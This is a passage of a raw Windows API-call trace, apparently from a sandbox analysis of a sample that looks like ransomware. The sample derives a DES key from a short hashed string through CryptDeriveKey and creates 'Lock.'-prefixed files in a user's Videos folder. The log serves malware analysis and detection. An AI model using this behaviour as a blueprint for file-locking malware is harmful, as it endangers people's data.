[0212.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab5d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.758] CryptCreateHash (in: hProv=0xa7c198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72698, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.758] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.759] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab6c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.759] CryptHashData (hHash=0x9e2138, pbData=0x2a72718, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.759] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.759] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab578, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.760] CryptDeriveKey (in: hProv=0xa7c198, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.760] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.760] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7160, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.761] CryptDestroyHash (hHash=0x9e2138) returned 1 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0212.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0212.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0212.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.762] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/PkICTcvFSPf3s9J" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.762] GetLastError () returned 0x5 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.764] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0212.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0212.764] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.PkICTcvFSPf3s9J" (normalized: "c:\\users\\fd1hvy\\videos\\lock.pkictcvfspf3s9j"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0212.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0212.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 